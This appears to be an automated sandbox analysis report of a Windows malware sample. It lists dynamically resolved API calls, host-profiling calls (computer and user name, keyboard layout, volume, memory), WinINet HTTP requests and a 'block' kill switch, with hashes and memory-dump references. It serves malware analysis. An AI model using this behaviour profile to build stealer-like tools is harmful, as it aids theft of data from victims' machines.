15546->15548 15547->14911 15667 948d20 LocalAlloc CharToOemW 15548->15667 15551 94a740 lstrcpy 15550->15551 15552 947bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15551->15552 15561 947c25 15552->15561 15553 947c46 GetLocaleInfoA 15553->15561 15554 947d18 15555 947d1e LocalFree 15554->15555 15556 947d28 15554->15556 15555->15556 15557 94a7a0 lstrcpy 15556->15557 15560 947d37 15557->15560 15558 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15558->15561 15559 94a8a0 lstrcpy 15559->15561 15560->14924 15561->15553 15561->15554 15561->15558 15561->15559 15563 942008 15562->15563 15563->14939 15565 9494b5 15564->15565 15566 949493 GetModuleFileNameExA CloseHandle 15564->15566 15567 94a740 lstrcpy 15565->15567 15566->15565 15568 942091 15567->15568 15568->14954 15570 947e68 RegQueryValueExA 15569->15570 15572 942119 15569->15572 15571 947e8e RegCloseKey 15570->15571 15571->15572 15572->14968 15574 947fb9 GetLogicalProcessorInformationEx 15573->15574 15575 947fd8 GetLastError 15574->15575 15577 948029 15574->15577 15576 948022 15575->15576 15585 947fe3 15575->15585 15578 942194 15576->15578 15581 9489f0 2 API calls 15576->15581 15582 9489f0 2 API calls 15577->15582 15578->14982 15581->15578 15583 94807b 15582->15583 15583->15576 15584 948084 wsprintfA 15583->15584 15584->15578 15585->15574 15585->15578 15668 9489f0 15585->15668 15671 948a10 GetProcessHeap RtlAllocateHeap 15585->15671 15587 94220f 15586->15587 15587->14996 15589 9489b0 15588->15589 15590 94814d GlobalMemoryStatusEx 15589->15590 15593 948163 15590->15593 15591 94819b wsprintfA 15592 942289 15591->15592 15592->15010 15593->15591 15595 9487fb GetProcessHeap RtlAllocateHeap wsprintfA 15594->15595 15597 94a740 lstrcpy 15595->15597 15598 94230b 15597->15598 15598->15024 15600 94a740 lstrcpy 15599->15600 15606 948229 15600->15606 15601 948263 15602 94a7a0 lstrcpy 15601->15602 15604 9482dc 15602->15604 15603 94a9b0 lstrcpy lstrlen lstrcpy lstrcat 15603->15606 15604->15041 15605 94a8a0 lstrcpy 15605->15606 

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(75900000,010F0828), ref: 009498A1
                              • GetProcAddress.KERNEL32(75900000,010F0738), ref: 009498BA
                              • GetProcAddress.KERNEL32(75900000,010F0750), ref: 009498D2
                              • GetProcAddress.KERNEL32(75900000,010F05D0), ref: 009498EA
                              • GetProcAddress.KERNEL32(75900000,010F0600), ref: 00949903
                              • GetProcAddress.KERNEL32(75900000,010F87F8), ref: 0094991B
                              • GetProcAddress.KERNEL32(75900000,010E5488), ref: 00949933
                              • GetProcAddress.KERNEL32(75900000,010E55A8), ref: 0094994C
                              • GetProcAddress.KERNEL32(75900000,010F0768), ref: 00949964
                              • GetProcAddress.KERNEL32(75900000,010F0558), ref: 0094997C
                              • GetProcAddress.KERNEL32(75900000,010F0780), ref: 00949995
                              • GetProcAddress.KERNEL32(75900000,010F0618), ref: 009499AD
                              • GetProcAddress.KERNEL32(75900000,010E56C8), ref: 009499C5
                              • GetProcAddress.KERNEL32(75900000,010F0798), ref: 009499DE
                              • GetProcAddress.KERNEL32(75900000,010F0570), ref: 009499F6
                              • GetProcAddress.KERNEL32(75900000,010E5528), ref: 00949A0E
                              • GetProcAddress.KERNEL32(75900000,010F0588), ref: 00949A27
                              • GetProcAddress.KERNEL32(75900000,010F08D0), ref: 00949A3F
                              • GetProcAddress.KERNEL32(75900000,010E5668), ref: 00949A57
                              • GetProcAddress.KERNEL32(75900000,010F0888), ref: 00949A70
                              • GetProcAddress.KERNEL32(75900000,010E5688), ref: 00949A88
                              • LoadLibraryA.KERNEL32(010F0870,?,00946A00), ref: 00949A9A
                              • LoadLibraryA.KERNEL32(010F0840,?,00946A00), ref: 00949AAB
                              • LoadLibraryA.KERNEL32(010F08E8,?,00946A00), ref: 00949ABD
                              • LoadLibraryA.KERNEL32(010F0900,?,00946A00), ref: 00949ACF
                              • LoadLibraryA.KERNEL32(010F08A0,?,00946A00), ref: 00949AE0
                              • GetProcAddress.KERNEL32(75070000,010F0858), ref: 00949B02
                              • GetProcAddress.KERNEL32(75FD0000,010F08B8), ref: 00949B23
                              • GetProcAddress.KERNEL32(75FD0000,010F8DC0), ref: 00949B3B
                              • GetProcAddress.KERNEL32(75A50000,010F8C58), ref: 00949B5D
                              • GetProcAddress.KERNEL32(74E50000,010E5728), ref: 00949B7E
                              • GetProcAddress.KERNEL32(76E80000,010F88E8), ref: 00949B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00949BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00949BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                              • Instruction ID: 4e3a645a52866a17abbc2a059fb9e18d62f8982cd02c3ee98246574011ed054a
                              • Opcode Fuzzy Hash: 329633dcacb3b3647d993135872ae44ad131efc7eb65844a7f5a3408605b16f6
                              • Instruction Fuzzy Hash: 01A10AB55042409FD3C8EFA8ED99A5E3BF9F7C8301714451AA61D832A4DE39A8C1DB53

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0093460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0093479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009346AC
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 464934a0711fbd2db57d232d8715835f86969681bded39744b7e0bd4a8b5da38
                              • Instruction ID: 70744519920e1460be2206e91c100d3a4755e3d6b75f5b1a3b77cbd3f07e1d32
                              • Opcode Fuzzy Hash: 464934a0711fbd2db57d232d8715835f86969681bded39744b7e0bd4a8b5da38
                              • Instruction Fuzzy Hash: 47410F70FC67046A8664FBA5A95EF9D77665F9A70AF81B060AC00522C3CFE07548C722

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 00936303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                              • HttpOpenRequestA.WININET(00000000,GET,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00936385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009363FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0093646D
                              • InternetCloseHandle.WININET(00000000), ref: 009364EF
                              • InternetCloseHandle.WININET(00000000), ref: 009364F9
                              • InternetCloseHandle.WININET(00000000), ref: 00936503
                              Strings
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                              • Instruction ID: 44cff992201395ad47bdee7d934bd4aa976205a06850b1e8d273f03bc709d2a2
                              • Opcode Fuzzy Hash: 15220ad5397087159140148160aa1a9ce684bf8e0f5ecbaaa7db7c4aeb4ea3a3
                              • Instruction Fuzzy Hash: FE712E71A40218ABEB24DFA0DC49FEE7778FB84705F108198F50A6B1D0DBB56A85CF52

                              Control-flow Graph

                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                              • Instruction ID: 141e3c857e02dfc20a55d0435e074817dd93af7d3a2f1a425a45ab724320d942
                              • Opcode Fuzzy Hash: 81c4767dcb64397c1b14623a2ee5d0f24c547e1020d3b23c5a4e1a6588ce0544
                              • Instruction Fuzzy Hash: 810181B1A04208EBC754DF99DD45FAEFBBCFB44B21F10425AFA45E3280D77459448BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                              • Instruction ID: d2e8a672d4b882b1481760b3cd24d3a066ae4faca9ef5b2f0a37785e7d6ae4c9
                              • Opcode Fuzzy Hash: bb2efe31865066094cf7f7628668bc26ce07e474e99a9806aff3a3fd48bfb4fe
                              • Instruction Fuzzy Hash: 6FF04FB1944208AFC714DF98DD4AFAEFBB8EB44711F10065AFA05A3680C77819448BA2
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                              • Instruction ID: 0f90b748f216af56805f1b9ddcd8cc7a3a25760013c21e6096c1af7058fee9e7
                              • Opcode Fuzzy Hash: 59362cef8abfdb3d57d551ac67321eda20de4781f0c868711c10ec224dd8516b
                              • Instruction Fuzzy Hash: DAD05E7490430CDBCB04DFE0D8496DDBB78FB48312F000555D90963340EE3068C2CAA6

                              Control-flow Graph (rendered graph omitted)
                              APIs
                              • GetProcAddress.KERNEL32(75900000,010E57C8), ref: 00949C2D
                              • GetProcAddress.KERNEL32(75900000,010E5448), ref: 00949C45
                              • GetProcAddress.KERNEL32(75900000,010F8F88), ref: 00949C5E
                              • GetProcAddress.KERNEL32(75900000,010F8F58), ref: 00949C76
                              • GetProcAddress.KERNEL32(75900000,010FC860), ref: 00949C8E
                              • GetProcAddress.KERNEL32(75900000,010FC800), ref: 00949CA7
                              • GetProcAddress.KERNEL32(75900000,010EB4F8), ref: 00949CBF
                              • GetProcAddress.KERNEL32(75900000,010FCA10), ref: 00949CD7
                              • GetProcAddress.KERNEL32(75900000,010FC848), ref: 00949CF0
                              • GetProcAddress.KERNEL32(75900000,010FC920), ref: 00949D08
                              • GetProcAddress.KERNEL32(75900000,010FC878), ref: 00949D20
                              • GetProcAddress.KERNEL32(75900000,010E54E8), ref: 00949D39
                              • GetProcAddress.KERNEL32(75900000,010E5408), ref: 00949D51
                              • GetProcAddress.KERNEL32(75900000,010E54A8), ref: 00949D69
                              • GetProcAddress.KERNEL32(75900000,010E54C8), ref: 00949D82
                              • GetProcAddress.KERNEL32(75900000,010FC980), ref: 00949D9A
                              • GetProcAddress.KERNEL32(75900000,010FC968), ref: 00949DB2
                              • GetProcAddress.KERNEL32(75900000,010EB520), ref: 00949DCB
                              • GetProcAddress.KERNEL32(75900000,010E5508), ref: 00949DE3
                              • GetProcAddress.KERNEL32(75900000,010FC818), ref: 00949DFB
                              • GetProcAddress.KERNEL32(75900000,010FC890), ref: 00949E14
                              • GetProcAddress.KERNEL32(75900000,010FC8A8), ref: 00949E2C
                              • GetProcAddress.KERNEL32(75900000,010FCA70), ref: 00949E44
                              • GetProcAddress.KERNEL32(75900000,010E5548), ref: 00949E5D
                              • GetProcAddress.KERNEL32(75900000,010FC950), ref: 00949E75
                              • GetProcAddress.KERNEL32(75900000,010FC830), ref: 00949E8D
                              • GetProcAddress.KERNEL32(75900000,010FC8C0), ref: 00949EA6
                              • GetProcAddress.KERNEL32(75900000,010FC938), ref: 00949EBE
                              • GetProcAddress.KERNEL32(75900000,010FC7E8), ref: 00949ED6
                              • GetProcAddress.KERNEL32(75900000,010FC8D8), ref: 00949EEF
                              • GetProcAddress.KERNEL32(75900000,010FC8F0), ref: 00949F07
                              • GetProcAddress.KERNEL32(75900000,010FC908), ref: 00949F1F
                              • GetProcAddress.KERNEL32(75900000,010FCA88), ref: 00949F38
                              • GetProcAddress.KERNEL32(75900000,010F9CE0), ref: 00949F50
                              • GetProcAddress.KERNEL32(75900000,010FC998), ref: 00949F68
                              • GetProcAddress.KERNEL32(75900000,010FC9B0), ref: 00949F81
                              • GetProcAddress.KERNEL32(75900000,010E5568), ref: 00949F99
                              • GetProcAddress.KERNEL32(75900000,010FC9C8), ref: 00949FB1
                              • GetProcAddress.KERNEL32(75900000,010E5588), ref: 00949FCA
                              • GetProcAddress.KERNEL32(75900000,010FC9E0), ref: 00949FE2
                              • GetProcAddress.KERNEL32(75900000,010FC9F8), ref: 00949FFA
                              • GetProcAddress.KERNEL32(75900000,010E55C8), ref: 0094A013
                              • GetProcAddress.KERNEL32(75900000,010E55E8), ref: 0094A02B
                              • LoadLibraryA.KERNEL32(010FCA28,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A03D
                              • LoadLibraryA.KERNEL32(010FCA40,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A04E
                              • LoadLibraryA.KERNEL32(010FCA58,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A060
                              • LoadLibraryA.KERNEL32(010FCAA0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A072
                              • LoadLibraryA.KERNEL32(010FC7B8,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A083
                              • LoadLibraryA.KERNEL32(010FC7D0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A095
                              • LoadLibraryA.KERNEL32(010FCD40,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0A7
                              • LoadLibraryA.KERNEL32(010FCAD0,?,00945CA3,00950AEB,?,?,?,?,?,?,?,?,?,?,00950AEA,00950AE3), ref: 0094A0B8
                              • GetProcAddress.KERNEL32(75FD0000,010E59E8), ref: 0094A0DA
                              • GetProcAddress.KERNEL32(75FD0000,010FCC98), ref: 0094A0F2
                              • GetProcAddress.KERNEL32(75FD0000,010F8828), ref: 0094A10A
                              • GetProcAddress.KERNEL32(75FD0000,010FCD10), ref: 0094A123
                              • GetProcAddress.KERNEL32(75FD0000,010E5A08), ref: 0094A13B
                              • GetProcAddress.KERNEL32(734B0000,010EB138), ref: 0094A160
                              • GetProcAddress.KERNEL32(734B0000,010E5928), ref: 0094A179
                              • GetProcAddress.KERNEL32(734B0000,010EAEE0), ref: 0094A191
                              • GetProcAddress.KERNEL32(734B0000,010FCB78), ref: 0094A1A9
                              • GetProcAddress.KERNEL32(734B0000,010FCC20), ref: 0094A1C2
                              • GetProcAddress.KERNEL32(734B0000,010E5908), ref: 0094A1DA
                              • GetProcAddress.KERNEL32(734B0000,010E5B48), ref: 0094A1F2
                              • GetProcAddress.KERNEL32(734B0000,010FCAE8), ref: 0094A20B
                              • GetProcAddress.KERNEL32(763B0000,010E5AA8), ref: 0094A22C
                              • GetProcAddress.KERNEL32(763B0000,010E5A28), ref: 0094A244
                              • GetProcAddress.KERNEL32(763B0000,010FCB18), ref: 0094A25D
                              • GetProcAddress.KERNEL32(763B0000,010FCD70), ref: 0094A275
                              • GetProcAddress.KERNEL32(763B0000,010E5A48), ref: 0094A28D
                              • GetProcAddress.KERNEL32(750F0000,010EB1B0), ref: 0094A2B3
                              • GetProcAddress.KERNEL32(750F0000,010EB200), ref: 0094A2CB
                              • GetProcAddress.KERNEL32(750F0000,010FCB00), ref: 0094A2E3
                              • GetProcAddress.KERNEL32(750F0000,010E5AE8), ref: 0094A2FC
                              • GetProcAddress.KERNEL32(750F0000,010E5988), ref: 0094A314
                              • GetProcAddress.KERNEL32(750F0000,010EAF30), ref: 0094A32C
                              • GetProcAddress.KERNEL32(75A50000,010FCC08), ref: 0094A352
                              • GetProcAddress.KERNEL32(75A50000,010E5808), ref: 0094A36A
                              • GetProcAddress.KERNEL32(75A50000,010F8898), ref: 0094A382
                              • GetProcAddress.KERNEL32(75A50000,010FCB60), ref: 0094A39B
                              • GetProcAddress.KERNEL32(75A50000,010FCC38), ref: 0094A3B3
                              • GetProcAddress.KERNEL32(75A50000,010E5A88), ref: 0094A3CB
                              • GetProcAddress.KERNEL32(75A50000,010E5B08), ref: 0094A3E4
                              • GetProcAddress.KERNEL32(75A50000,010FCB90), ref: 0094A3FC
                              • GetProcAddress.KERNEL32(75A50000,010FCBA8), ref: 0094A414
                              • GetProcAddress.KERNEL32(75070000,010E59A8), ref: 0094A436
                              • GetProcAddress.KERNEL32(75070000,010FCBF0), ref: 0094A44E
                              • GetProcAddress.KERNEL32(75070000,010FCAB8), ref: 0094A466
                              • GetProcAddress.KERNEL32(75070000,010FCD58), ref: 0094A47F
                              • GetProcAddress.KERNEL32(75070000,010FCBC0), ref: 0094A497
                              • GetProcAddress.KERNEL32(74E50000,010E5948), ref: 0094A4B8
                              • GetProcAddress.KERNEL32(74E50000,010E5888), ref: 0094A4D1
                              • GetProcAddress.KERNEL32(75320000,010E58A8), ref: 0094A4F2
                              • GetProcAddress.KERNEL32(75320000,010FCC50), ref: 0094A50A
                              • GetProcAddress.KERNEL32(6F060000,010E5A68), ref: 0094A530
                              • GetProcAddress.KERNEL32(6F060000,010E5AC8), ref: 0094A548
                              • GetProcAddress.KERNEL32(6F060000,010E5828), ref: 0094A560
                              • GetProcAddress.KERNEL32(6F060000,010FCD28), ref: 0094A579
                              • GetProcAddress.KERNEL32(6F060000,010E5B28), ref: 0094A591
                              • GetProcAddress.KERNEL32(6F060000,010E5968), ref: 0094A5A9
                              • GetProcAddress.KERNEL32(6F060000,010E58C8), ref: 0094A5C2
                              • GetProcAddress.KERNEL32(6F060000,010E5B88), ref: 0094A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0094A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0094A607
                              • GetProcAddress.KERNEL32(74E00000,010FCC80), ref: 0094A629
                              • GetProcAddress.KERNEL32(74E00000,010F88F8), ref: 0094A641
                              • GetProcAddress.KERNEL32(74E00000,010FCB30), ref: 0094A659
                              • GetProcAddress.KERNEL32(74E00000,010FCD88), ref: 0094A672
                              • GetProcAddress.KERNEL32(74DF0000,010E5848), ref: 0094A693
                              • GetProcAddress.KERNEL32(6E340000,010FCDA0), ref: 0094A6B4
                              • GetProcAddress.KERNEL32(6E340000,010E59C8), ref: 0094A6CD
                              • GetProcAddress.KERNEL32(6E340000,010FCCB0), ref: 0094A6E5
                              • GetProcAddress.KERNEL32(6E340000,010FCBD8), ref: 0094A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                              • Instruction ID: 91de966e16298bd3e484c94aa6f37a2f66022c045ce782f52fac566706700196
                              • Opcode Fuzzy Hash: f32a9d1bbe830ce7b05c094ee30e1c8c38dbf57f8c75c60c5cb88f958b9fecfc
                              • Instruction Fuzzy Hash: 286207B5514200AFD3C8DFA8ED8996E3BF9F7CC601714851AA61DC3264DE39A8C1DB63

                              Control-flow Graph (rendered graph omitted)
                              APIs
                                • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009456A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945857
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 009452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945318
                                • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 0094532F
                                • Part of subcall function 009452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00945364
                                • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 00945383
                                • Part of subcall function 009452C0: lstrlen.KERNEL32(00000000), ref: 009453AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0094578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00945940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00945A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                              • Instruction ID: ced24c18dbb201631004875d677b0a25b965b4a3d7b57816d3f8fbea355d3a71
                              • Opcode Fuzzy Hash: 54e52d268093d796c8d6aa37bf8d60299a24348047cf3a8359df9f21a1588034
                              • Instruction Fuzzy Hash: 5FE1FD72950104ABDB14FBB0DC96FED737DAFD4304F508528B506671A2EF34AA49CBA2

                              Control-flow Graph (rendered graph omitted)
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 009417C5
                              • ExitProcess.KERNEL32 ref: 009417D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: dff258eca261e480a961f1a966e479341528653b64dd5cacd7c2519876cf0f75
                              • Instruction ID: f59244c9c99dad16de2d8f535662eb7c5acdd08041d44fe350de526d989836e9
                              • Opcode Fuzzy Hash: dff258eca261e480a961f1a966e479341528653b64dd5cacd7c2519876cf0f75
                              • Instruction Fuzzy Hash: AF514DB5B14209EBDB04DFA1E994FBE77B5BF84704F108448E805A7380D774E985CB62

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Control-flow graph (graph data, image residue): basic blocks 947500-94768e; subcalls 948d00, 94a740; APIs GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA]
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00947542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0094760A
                              • wsprintfA.USER32 ref: 00947640
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                              • Instruction ID: 6df8380ddd4e79737687fe88f489c4c59d73ff366d631d71bf4d387c66587923
                              • Opcode Fuzzy Hash: 88557aec08a69a3708ed7e40bfdf30d96531a808ce4bf0fd05aa2ed2409fa841
                              • Instruction Fuzzy Hash: 364193B1D04248ABDF10DF94DC45FEEBBB8EF48704F104199F50967280DB78AA84CBA6

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0828), ref: 009498A1
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0738), ref: 009498BA
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0750), ref: 009498D2
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F05D0), ref: 009498EA
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0600), ref: 00949903
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F87F8), ref: 0094991B
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010E5488), ref: 00949933
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010E55A8), ref: 0094994C
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0768), ref: 00949964
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0558), ref: 0094997C
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0780), ref: 00949995
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0618), ref: 009499AD
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010E56C8), ref: 009499C5
                                • Part of subcall function 00949860: GetProcAddress.KERNEL32(75900000,010F0798), ref: 009499DE
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 009311D0: ExitProcess.KERNEL32 ref: 00931211
